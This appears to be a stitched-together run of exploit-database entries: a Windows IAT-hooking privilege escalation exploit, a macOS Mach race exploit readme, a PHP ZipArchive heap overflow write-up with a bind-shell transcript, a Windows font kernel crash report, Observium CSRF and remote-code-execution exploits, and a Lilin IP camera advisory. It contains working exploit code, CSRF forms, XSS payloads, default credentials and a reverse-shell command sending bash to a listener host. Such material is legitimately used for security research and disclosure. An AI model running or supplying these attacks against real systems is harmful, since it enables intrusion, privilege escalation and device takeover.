if (IMAGE_NT_SIGNATURE != NtHeader->Signature)
{
return HRESULT_FROM_WIN32(ERROR_BAD_EXE_FORMAT);
}
ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)
PtrFromRva(DosHeader,
NtHeader->OptionalHeader.DataDirectory
[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
//
// Iterate over import descriptors/DLLs.
//
for (Index = 0;
ImportDescriptor[Index].Characteristics != 0;
Index++)
{
PSTR dllName = (PSTR)
PtrFromRva(DosHeader, ImportDescriptor[Index].Name);
if (0 == _strcmpi(dllName, ImportedModuleName))
{
//
// This the DLL we are after.
//
PIMAGE_THUNK_DATA Thunk;
PIMAGE_THUNK_DATA OrigThunk;
if (!ImportDescriptor[Index].FirstThunk ||
!ImportDescriptor[Index].OriginalFirstThunk)
{
return E_INVALIDARG;
}
Thunk = (PIMAGE_THUNK_DATA)
PtrFromRva(DosHeader,
ImportDescriptor[Index].FirstThunk);
OrigThunk = (PIMAGE_THUNK_DATA)
PtrFromRva(DosHeader,
ImportDescriptor[Index].OriginalFirstThunk);
for (; OrigThunk->u1.Function != NULL;
OrigThunk++, Thunk++)
{
if (OrigThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
{
//
// Ordinal import - we can handle named imports
// ony, so skip it.
//
continue;
}
PIMAGE_IMPORT_BY_NAME import = (PIMAGE_IMPORT_BY_NAME)
PtrFromRva(DosHeader, OrigThunk->u1.AddressOfData);
if (0 == strcmp(ImportedProcName,
(char*)import->Name))
{
//
// Proc found, patch it.
//
DWORD junk;
MEMORY_BASIC_INFORMATION thunkMemInfo;
//
// Make page writable.
//
VirtualQuery(
Thunk,
&thunkMemInfo,
sizeof(MEMORY_BASIC_INFORMATION));
if (!VirtualProtect(
thunkMemInfo.BaseAddress,
thunkMemInfo.RegionSize,
PAGE_EXECUTE_READWRITE,
&thunkMemInfo.Protect))
{
return HRESULT_FROM_WIN32(GetLastError());
}
//
// Replace function pointers (non-atomically).
//
if (OldProc)
{
*OldProc = (PVOID)(DWORD_PTR)
Thunk->u1.Function;
}
#ifdef _WIN64
Thunk->u1.Function = (ULONGLONG)(DWORD_PTR)
AlternateProc;
#else
Thunk->u1.Function = (DWORD)(DWORD_PTR)
AlternateProc;
#endif
//
// Restore page protection.
//
if (!VirtualProtect(
thunkMemInfo.BaseAddress,
thunkMemInfo.RegionSize,
thunkMemInfo.Protect,
&junk))
{
return HRESULT_FROM_WIN32(GetLastError());
}
return S_OK;
}
}
//
// Import not found.
//
return HRESULT_FROM_WIN32(ERROR_PROC_NOT_FOUND);
}
}
//
// DLL not found.
//
return HRESULT_FROM_WIN32(ERROR_MOD_NOT_FOUND);
}
typedef void* (__stdcall *fCsrClientCallServer)(void* a, void* b, DWORD c, void* d);
fCsrClientCallServer g_pCsgClientCallServer;
void* __stdcall CsrClientCallServerHook(void* a, void* b, DWORD c, void* d)
{
void* ret = nullptr;
printf("In ClientCall hook %08X\n", c);
if (c == 0x10010005)
{
printf("Set Anonymous Token: %d\n", SetThreadToken(nullptr, GetAnonymousToken()));
}
ret = g_pCsgClientCallServer(a, b, c, d);
RevertToSelf();
return ret;
}
int main(int argc, char** argv)
{
BOOL is_wow64 = FALSE;
if (IsWow64Process(GetCurrentProcess(), &is_wow64) && is_wow64)
{
printf("Error: This must be run on 32 bit Windows\n");
return 1;
}
// Hook the call to CsrClientCallServer from kernel32 to apply the anonymous token.
PVOID hook;
HRESULT hr = PatchIat(GetModuleHandle(L"kernel32.dll"), "ntdll.dll", "CsrClientCallServer", CsrClientCallServerHook, &hook);
if (FAILED(hr))
{
printf("Error patching IAT: %08X\n", hr);
return 1;
}
g_pCsgClientCallServer = (fCsrClientCallServer)hook;
printf("Patched client %p %p\n", hook, GetProcAddress(GetModuleHandle(L"ntdll.dll"), "CsrClientCallServer"));
HANDLE hThread = CreateThread(nullptr, 0, CaptureAndSuspendProcess, nullptr, 0, nullptr);
// Wait a little just to ensure capture loop is running.
Sleep(1000);
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
PROCESS_INFORMATION procInfo = {};
WCHAR cmdline[] = L"edit.com";
// Create a 16bit executable, this will call into CSRSS which we've hooked.
CreateProcess(nullptr, cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo);
return 0;
}
Source: https://github.com/gdbinit/mach_race
Mach Race OS X Local Privilege Escalation Exploit
(c) fG! 2015, 2016, reverser@put.as - https://reverse.put.as
A SUID, SIP, and binary entitlements universal OS X exploit (CVE-2016-1757).
Usage against a SUID binary:
./mach_race_server /bin/ps _compat_mode
for i in seq 0 1000000; do ./mach_race_client /bin/ps; done
Against an entitled binary to bypass SIP:
./mach_race_server /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove _geteuid
for i in seq 0 1000000; do ./mach_race_client /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove; done
Note: because the service name is not modified you can't chain this exploit from user to root and then use it to bypass SIP since bootstrap_register2 will fail the second time (service is already registered with launchd from the first run). The solution is to add a parameter to use a different service name for example.
Note2: there's no need to make this into two separate apps, a single binary works, you just need to fork a server and client.
References:
https://reverse.put.as/wp-content/uploads/2016/04/SyScan360_SG_2016_-_Memory_Corruption_is_for_wussies.pdf
http://googleprojectzero.blogspot.pt/2016/03/race-you-to-kernel.html
Tested against Mavericks 10.10.5, Yosemite 10.10.5, El Capitan 10.11.2 and 10.11.3.
Fixed in El Capitan 10.11.4.
Should work with all OS X versions (depends if bootstrap_register2 exists on older versions).
Alternative implementation with bootstrap_create_server possible for older versions.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39741.zip
Details
=======
An integer wrap may occur in PHP 7.x before version 7.0.6 when reading
zip files with the getFromIndex() and getFromName() methods of
ZipArchive, resulting in a heap overflow.
php-7.0.5/ext/zip/php_zip.c
,----
| 2679 static void php_zip_get_from(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */
| 2680 {
| ....
| 2684 struct zip_stat sb;
| ....
| 2689 zend_long len = 0;
| ....
| 2692 zend_string *buffer;
| ....
| 2702 if (type == 1) {
| 2703 if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|ll", &filename, &len, &flags) == FAILURE) {
| 2704 return;
| 2705 }
| 2706 PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), flags, sb); // (1)
| 2707 } else {
| 2708 if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|ll", &index, &len, &flags) == FAILURE) {
| 2709 return;
| 2710 }
| 2711 PHP_ZIP_STAT_INDEX(intern, index, 0, sb); // (1)
| 2712 }
| ....
| 2718 if (len < 1) {
| 2719 len = sb.size;
| 2720 }
| ....
| 2731 buffer = zend_string_alloc(len, 0); // (2)
| 2732 n = zip_fread(zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer)); // (3)
| ....
| 2742 }
`----
With `sb.size' from (1) being:
php-7.0.5/ext/zip/lib/zip_stat_index.c
,----
| 038 ZIP_EXTERN int
| 039 zip_stat_index(zip_t *za, zip_uint64_t index, zip_flags_t flags,
| 040 zip_stat_t *st)
| 041 {
| ...
| 043 zip_dirent_t *de;
| 044
| 045 if ((de=_zip_get_dirent(za, index, flags, NULL)) == NULL)
| 046 return -1;
| ...
| 063 st->size = de->uncomp_size;
| ...
| 086 }
`----
Both `size' and `uncomp_size' are unsigned 64bit integers:
php-7.0.5/ext/zip/lib/zipint.h
,----
| 339 struct zip_dirent {
| ...
| 351 zip_uint64_t uncomp_size; /* (cl) size of uncompressed data */
| ...
| 332 };
`----
php-7.0.5/ext/zip/lib/zip.h
,----
| 279 struct zip_stat {
| ...
| 283 zip_uint64_t size; /* size of file (uncompressed) */
| ...
| 290 };
`----
Whereas `len' is signed and has a platform-dependent size:
php-7.0.5/Zend/zend_long.h
,----
| 028 #if defined(__x86_64__) || defined(__LP64__) || defined(_LP64) || defined(_WIN64)
| 029 # define ZEND_ENABLE_ZVAL_LONG64 1
| 030 #endif
| ...
| 033 #ifdef ZEND_ENABLE_ZVAL_LONG64
| 034 typedef int64_t zend_long;
| ...
| 043 #else
| 044 typedef int32_t zend_long;
| ...
| 053 #endif
`----
Uncompressed file sizes in zip-archives may be specified as either 32-
or 64bit values; with the latter requiring that the size be specified in
the extra field in zip64 mode.
Anyway, as for the invocation of `zend_string_alloc()' in (2):
php-7.0.5/Zend/zend_string.h
,----
| 119 static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent)
| 120 {
| 121 zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent); // (4)
| ...
| 133 ZSTR_LEN(ret) = len; // (5)
| 134 return ret;
| 135 }
`----
The `size' argument to the `pemalloc' macro is aligned/adjusted in (4)
whilst the *original* value of `len' is stored as the size of the
allocated buffer in (5). No boundary checking is done in (4) and it may
thus wrap, which would lead to a heap overflow during the invocation of
`zip_fread()' in (3) as the `toread' argument is `ZSTR_LEN(buffer)':
php-7.0.5/Zend/zend_string.h
,----
| 041 #define ZSTR_LEN(zstr) (zstr)->len
`----
On a 32bit system:
,----
| (gdb) p/x ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(0xfffffffe))
| $1 = 0x10
`----
The wraparound may also occur on 64bit systems with `uncomp_size'
specified in the extra field (Zip64 mode; ext/zip/lib/zip_dirent.c:463).
However, it won't result in a buffer overflow because of `zip_fread()'
bailing on a size that would have wrapped the allocation in (4):
php-7.0.5/ext/zip/lib/zip_fread.c
,----
| 038 ZIP_EXTERN zip_int64_t
| 039 zip_fread(zip_file_t *zf, void *outbuf, zip_uint64_t toread)
| 040 {
| ...
| 049 if (toread > ZIP_INT64_MAX) {
| 050 zip_error_set(&zf->error, ZIP_ER_INVAL, 0);
| 051 return -1;
| 052 }
| ...
| 063 }
`----
php-7.0.5/ext/zip/lib/zipconf.h
,----
| 130 #define ZIP_INT64_MAX 0x7fffffffffffffffLL
`----
,----
| (gdb) p/x ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(0x7fffffffffffffff))
| $1 = 0x8000000000000018
`----
PoC
===
Against Arch Linux i686 with php-fpm 7.0.5 behind nginx [1]:
,----
| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
| [*] this may take a while
| [*] 103 of 4096 (0x67fd0)...
| [+] connected to 1.2.3.4:5555
|
| id
| uid=33(http) gid=33(http) groups=33(http)
|
| uname -a
| Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST
| 2016 i686 GNU/Linux
|
| pacman -Qs php-fpm
| local/php-fpm 7.0.5-2
| FastCGI Process Manager for PHP
|
| cat upload.php
| <?php
| $zip = new ZipArchive();
| if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) {
| echo "cannot open archive\n";
| } else {
| for ($i = 0; $i < $zip->numFiles; $i++) {
| $data = $zip->getFromIndex($i);
| }
| $zip->close();
| }
| ?>
`----
Solution
========
This issue has been fixed in php 7.0.6.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39742.zip
https://github.com/dyntopia/exploits/tree/master/CVE-2016-3078
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=684
We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example of a crash log excerpt generated after triggering the bug is shown below:
---
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000021, the data following the pool block being freed is corrupt. Typically this means the consumer (call stack ) has overrun the block.
Arg2: ff66c000, The pool pointer being freed.
Arg3: 00001038, The number of bytes allocated for the pool block.
Arg4: 00000000, The corrupted value found following the pool block.
Debugging Details:
------------------
BUGCHECK_STR: 0x19_21
POOL_ADDRESS: GetPointerFromAddress: unable to read from 8277684c
Unable to read MiSystemVaType memory at 82755780
ff66c000
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: VERIFIER_ENABLED_VISTA_MINIDUMP
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) amd64fre
LAST_CONTROL_TRANSFER: from 82942f90 to 8272cc6b
STACK_TEXT:
b5ccb5c0 82942f90 ff66c000 00000000 ff66c000 nt!ExFreePoolWithTag+0x1b1
b5ccb5d4 9916b9e2 ff66c000 00000000 fb834e78 nt!VerifierExFreePoolWithTag+0x30
b5ccb5e8 99159ebf ff66c010 fb82af24 00000001 win32k!EngFreeMem+0x1f
b5ccb728 9914eda9 0000002c 0000001c b5ccb818 win32k!lGetGlyphBitmap+0x258
b5ccb750 9914ebf6 00000000 00000001 0000001c win32k!ttfdQueryFontData+0x15e
b5ccb7a0 9914de12 ff7a5010 fb82acf0 00000001 win32k!ttfdSemQueryFontData+0x45
b5ccb7e8 991538bd ff7a5010 fb82acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
b5ccb860 991cc470 b5ccbb3c ff6b0300 ff6ab094 win32k!xInsertMetricsPlusRFONTOBJ+0x120
b5ccb890 99145a6f 0000000a ff7bf050 b5ccbbda win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
b5ccb8c8 991cbf6e b5ccbb1c b5ccbb3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
b5ccb90c 991456f2 b5ccbbd0 0000000a b5ccbb1c win32k!ESTROBJ::vInit+0x268
b5ccbb2c 991458b5 00000000 b5ccbbd0 fb82acf0 win32k!GreGetTextExtentExW+0x12a
b5ccbc0c 82647a06 2b01027a 006e0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
b5ccbc0c 76e871b4 2b01027a 006e0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0026f2ac 00000000 00000000 00000000 00000000 0x76e871b4
---
The type of the bugcheck implies a pool-based buffer overflow or some other type of pool corruption, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "EBLC" and "EBSC" tables.
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for win32k.sys, but it is also possible to observe a crash on a default Windows installation in win32k.sys or another location in kernel space, as caused by the corrupted pool state.
Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.
The vendor communication timeline is as follows:
12/22/2015 Vulnerability is reported to Microsoft.
12/22/2015 MSRC acknowledges the receipt of the report.
01/09/2016 MSRC informs us they are unable to reproduce the issue and ask for a crash dump that may help.
01/11/2016 We send MSRC 32-bit and 64-bit crash dumps, together with additional repro information.
01/11/2016 MSRC acknowledges the receipt of the new information.
01/21/2016 MSRC informs us they still cannot reproduce the crash, and the provided crash dumps didn't help. They ask for more detailed information (full crash dump, environment details, POC program etc.)
01/25/2016 Upon further investigation, we realize that the bugcheck only occurs if the [Computer => Properties => Advanced system settings => Advanced => Performance => Settings => Visual Effects => Smooth edges of screen fonts] option is unchecked in system settings, and let MSRC know about this discovery.
01/25/2016 MSRC confirm that the crash now reproduces reliably on their side.
Since Microsoft was only able to get a repro of this issue on 01/25/2016 due to the non-standard system settings, we are resetting the 90-day period start date to that day.
When the "Smooth edges of screen fonts" option is disabled, the bugcheck also occurs on versions of Windows other than 7 (confirmed with Windows 8.1). By further minimizing the POC sample, it is also possible to trigger the crash by simply opening it in the default "Windows Font Viewer" utility.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39743.zip
<!--
# Exploit title: Observium Commercial - CSRF
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533
# Details:
Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Observium focuses on providing a beautiful and powerful yet simple and intuitive interface to the health and status of your network.
CSRF details
due to lack of csrf protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it.
i.e. New password <Enter new pass> & retype password <Enter new pass>
instead of having to insert the older password.
such an attack would look like this:
-->
<html>
<div align="center">
<pre>
<h2><b>Change admin password<b></h2>
<body>
<form
action="http://observiumIP/edituser/user_id=1/"
method="POST">
<input type="hidden" name="action" value="changepass" />
<input type="hidden" name="new_pass" value="test123" />
<input type="hidden" name="new_pass2" value="test123" />
<input type="submit" name="submit" value="save" />
</form>
</body>
</div>
</html>
# Exploit title: Observium Commercial - Authenticated RCE
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533
Authenticated remote code execution
Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8
using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener
root@pt:~# nc -lvp 4444
listening on [any] 4444 ...
and a CSRF which looks like this:
<!--
<html>
<div align="center">
<pre>
<h2><b>CSRF<b></h2>
<body>
<form
action="http://<observiumIP>/settings/section=paths/"
method="POST">
<input type="hidden" name="temp_dir" value="" />
<input type="hidden" name="varset_temp_dir" value="" />
<input type="hidden" name="varset_rrdtool" value="" />
<input type="hidden" name="fping" value="" />
<input type="hidden" name="varset_fping" value="" />
<input type="hidden" name="fping6" value="" />
<input type="hidden" name="varset_fping6" value="" />
<input type="hidden" name="svn" value="" />
<input type="hidden" name="varset_svn" value="" />
<input type="hidden" name="snmpget" value="" />
<input type="hidden" name="varset_snmpget" value="" />
<input type="hidden" name="snmpwalk" value="" />
<input type="hidden" name="varset_snmpwalk" value="" />
<input type="hidden" name="snmpbulkget" value="" />
<input type="hidden" name="varset_snmpbulkget" value="" />
<input type="hidden" name="snmpbulkwalk" value="" />
<input type="hidden" name="varset_snmpbulkwalk" value="" />
<input type="hidden" name="snmptranslate" value="" />
<input type="hidden" name="varset_snmptranslate" value="" />
<input type="hidden" name="ipmitool" value="" />
<input type="hidden" name="varset_ipmitool" value="" />
<input type="hidden" name="virsh" value="" />
<input type="hidden" name="varset_virsh" value="" />
<input type="hidden" name="wmic" value="" />
<input type="hidden" name="varset_wmic" value="" />
<input type="hidden" name="git" value="" />
<input type="hidden" name="varset_git" value="" />
<input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" />
<input type="hidden" name="varset_whois" value="" />
<input type="hidden" name="whois_custom" value="1" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="varset_file" value="" />
<input type="hidden" name="dot" value="" />
<input type="hidden" name="varset_dot" value="" />
<input type="submit" name="submit" value="save" />
</form>
</body>
</div>
</html>
or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the
whois parameter which gives us a reverse shell on the machine:
you may also use the following python instead:
"""
import sys
import urllib
import urllib2
import cookielib
#!/usr/bin/python
username = 'test'
password = '123456'
timeout = 10
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''})
opener.open('http://observium-server', login_data, timeout=timeout)
url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8'
resp = opener.open(url)
except Exception, e:
print e
sys.exit(1)
"""
listening on [any] 4444 ...
192.168.2.155: inverse host lookup failed: Unknown host
connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413
bash: no job control in this shell
bash: /root/.bashrc: Permission denied
bash-4.1$ ls -l /opt
ls -l /opt
total 48944
drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium
-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz
drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh
_ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
www.orwelllabs.com
securityadivisory
@orwelllabs
;)(r
By sitting in the alcove, and keeping well back,
Winston was able to remain outside the range of the telescreen...
* Adivisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: Merit Lilin IP Cameras Multiple Vulnerabilities
(+) Vendor: Merit Lilin Enterprise Co., Ltd.
(+) Research and Advisory: Orwelllabs
(+) Adivisory URL:
http://www.orwelllabs.com/2016/04/merit-lilin-ip-cameras-multiple_27.html
(+) OLSA-ID: OLSA-2016-04-28
(+) Affected Versions: L series products with firmware 1.4.36/1.2.02, OS
Version: Linux 2.6.38/Linux 2.6.32
(+) IoT Attack Surface: Device Administrative
Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Adivisory Overview
--+---------------------------------------------+------+--------------------------------------------
id| Vulnerability Title | Rank | Attack Surface
--+---------------------------------------------+------+--------------------------------------------
1 | Multiple Cross-site Request Forgery | I1 | Insecure Web Interfaces
2 | Multiple Cross-site Scripting/HTML Injection| I1 | Insecure Web
Interfaces
3 | Hard-coded credentials | I1 | Insecure Web Interfaces
4 | Cleartext sensitive data | I1 | Insecure Web Interfaces
5 | Weak Passwords/Known credentials | I1 | Insecure Web Interfaces
6 | Account lockout | I1 | Insecure Web Interfaces
7 | Poorly Protected Credentials | I2 | Insufficient
Authentication/Authorization
--+---------------------------------------------+------+--------------------------------------------
Vendor Background
=================
LILIN, is a global IP video manufacturer of IP video cameras, recording
devices, and software with over 30 years of experience.
1. Multiple Cross-site Request Forgery
======================================
Merit LILIN IP Cameras are prone to multiple cross-site request forgery
vulnerabilities.
(+) Technical Details and PoCs:
-------------------------------
# Basic >> System >> User
> Changing 'admin' password to 'w!nst0nSm!th'
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply2.cgi?action=useredit&user_seq=1&user_account=admin&user_password=w!nst0nSm!th&user_priority=254&user_group=0
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# Basic >> Network >> DDNS
> change DDNS information (user/hostname/password)
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply.cgi?action=ddns_apply&next_page=ddns.asp&ddns_type=0&ddns_flag=1&ddns_account=Winston&ddns_pwd=pass&ddns_hostname=smithwmachine&ddns_new_pwd=&ddns_wanip=
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# SNMP
> change community/user/pass/pripass/v3rouser/etc.
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/snmp?snmpenable=0&v12rwcommunity=public&v12rocommunity=private&v3user=admin&v3authpass=password&v3pripass=w!nst0nSm!th&v3rwuser=public&v3rouser=private
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# Basic >> Network >> SIP
> change sip_domain_server/sipreg_username/sipreg_password/sip_port=/etc.
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply.cgi?action=sip_apply&next_page=sip.asp&voip_flag=1&sip_domain_server=lilintw.ddnsipcam.com&sipreg_username=admin&sipreg_password=pass&sipreg_expires=0&sip_port=5060&audiortp_port=7078&videortp_port=9078
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
2. Multiple Cross-site Scripting/HTML Injection
====================-==========================
Merit Lilin IP Cameras are prone to multiple cross-site scripting
vulnerabilities.
Technical Details and PoCs:
---------------------------
[SAMBA] Advance >> System >> SAMBA Service
------------------------------------------
%- Script: apply.cgi
%- affected parameters:
(+) action
(+) SambaRecordState
(+) SAMBA_OSD
(+) SAMBARecordOption2
(+) SAMBARecordFormat
(+) SAMBAPreRecordTime
(+) SAMBAServer
(+) SAMBAServerPort
(+) SAMBAServerAccount
(+) SAMBAServerPassword
(+) SAMBAServerDirectory
%- [ *** XSS *** ] Payload(1) used:
123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
%- URL: http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS ***
]&SambaRecordState=[ *** XSS *** ]&SAMBA_OSD=[ *** XSS ***
]&SAMBARecordOption2=[ *** XSS *** ]&SAMBARecordFormat=[ *** XSS ***
]&SAMBAPreRecordTime=[ *** XSS *** ]&SAMBAServer=[ *** XSS ***
]&SAMBAServerPort=[ *** XSS *** ]&SAMBAServerAccount=[ *** XSS ***
]&SAMBAServerPassword=[ *** XSS *** ]&SAMBAServerDirectory=[ *** XSS *** ]
[General] -> Basic >> System >> General
---------------------------------------
- Affected script: apply.cgi
- affected parameters:
(+) action
(+) next_page
(+) SAMBAServerDirectory
%- [ *** XSS *** ] Payload(2) used:
%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
%- URL http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** ]&next_page=[
*** XSS ***
]&CAM_NAME=LR6122&ACTIVEX_OSD_NAME=LR6122&CAM_OSD=0&TIMER_OSD=0&ACTIVEX_OSD_ENABLE=0&ACTIVEX_MODE=0
[HTTP POST Service] -> Advance >> Event >> HTTP POST Service
------------------------------------------------------------
- Affected script: apply.cgi
- affected parameters:
(+) AM_HTTP_JPEG
(+) next_page*-*
(+) HTTPPostPort*-*
%- [ *** XSS *** ] Payload used:
123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
*-* Payload(2)
%- URL:
http://xxx.xxx.xxx.xxx/apply.cgi?action=httppost_apply&next_page=httppost.asp&HTTPServer=192.168.0.2&HTTPPostPort=56082&HTTPAccount=LILIN&HTTPPassword=control4&AM_HTTP_JPEG=[
*** XSS *** ]
3. Hard-coded credentials
=========================
This application stores hard-coded credentials in html code.
Technical Details and PoCs:
---------------------------
(+) GET -> http://xxx.xxx.xxx.xxx/new/index.htm
HTML Source code:
<script>
var g_ScreenMode = GetCookie('ScreenMode');
if(g_ScreenMode==null || g_ScreenMode=='' || g_ScreenMode==' ')
{
g_ScreenMode = 1;
SetCookie('ScreenMode', 1);
}
var g_AD_OSD_FLAG = GV('0','0');
//Profileno,Width,Height,Type,ScreenSwitch,Resolution,Cmd
var g_CtrlInfo = new Ctrl_ProfileInfo('',0,0,'',g_ScreenMode,'','');
var g_AD_RATE = Number('0');
var g_video_port = Number('0');
var g_spook_port = Number('554');
var g_httpd_auth_account = 'admin'; <<<<<---- user
var g_httpd_auth_passwd = 'pass'; <<<<<---- pass
var g_encode_mode = Number('0');
var g_profile00_fps_dwell = 1000/Number('15');
var g_profile01_fps_dwell = 1000/Number('5');
var g_profile02_fps_dwell = 1000/Number('25');
var g_profile03_fps_dwell = 1000/Number('0');
var g_ACTIVEX_OSD_ENABLE = Number('0');
var g_title_name = 'LR6122';
var g_CAM_OSD = Number('0');
var g_TIMER_OSD = Number('0');
[... Snip ...]
(+) GET -> http://xxx.xxx.xxx.xxx/new/no_sd_file.htm
HTML source code:
[... Snip ...]
//http://192.168.3.162/sdlist?dirlist=0
//http://192.168.3.225/sdlist?filelist=2012081001
//var g_AllDir =
"2012080901,2012080902,2012080903,2012080904,2012080905,2012080906:2012081001,2012081002:2012081101,2012081111";
//var g_AllFiles =
"20120809010124.avi,20120809010234.avi,20120809010334.avi,20120809010434.avi,20120809010534.avi,20120809010643.avi";
var g_httpd_auth_account = GV('admin','admin'); <<<<<---- here
var g_httpd_auth_passwd = GV('pass','pass'); <<<<<---- here
[... Snip ...]
4. Cleartext sensitive data
===========================
Everything is trasmite over HTTP, including credentials,
like this, when an administrador "submmit" the Samba configuration form
(cleartext everywhere).
Technical Details and PoCs:
---------------------------
GET
/apply.cgi?action=sambarec_apply&SambaRecordState=0&SAMBA_OSD=0&SAMBARecordOption2=0&SAMBARecordFormat=0&SAMBAPreRecordTime=5&SAMBAServer=192.168.0.100&SAMBAServerPort=5000&SAMBAServerAccount=admin&SAMBAServerPassword=pass&SAMBAServerDirectory=/Public
HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzcw==
Connection: keep-alive
5. Weak Default Credentials/Known credentials
=============================================
The vast maiority of these devices remain with default credential
admin:pass (cameras)/admin:1111 (NVR) and costumers are not obligated to
change it during initial setup. The best
6. Account Lockout
==================
There is no control to prevent brute force attacks and to lockout an
account after X failed login attempts.
I1.Impact
---------
Insecure web interfaces can result in data loss or corruption, lack of
accountability, or denial of access and can lead to complete device
takeover.
7. Poorly Protected Credentials
===============================
An attacker in the same network is able to capture and decode the
credentials as they aren't trasmited over HTTPs and are protected using
just Base64 encoding.
Technical Details and PoCs:
---------------------------
> GET Request of) Authentication Process
GET /new/setup.htm HTTP/1.1
Host: xxx.xxx.xxx.xxx
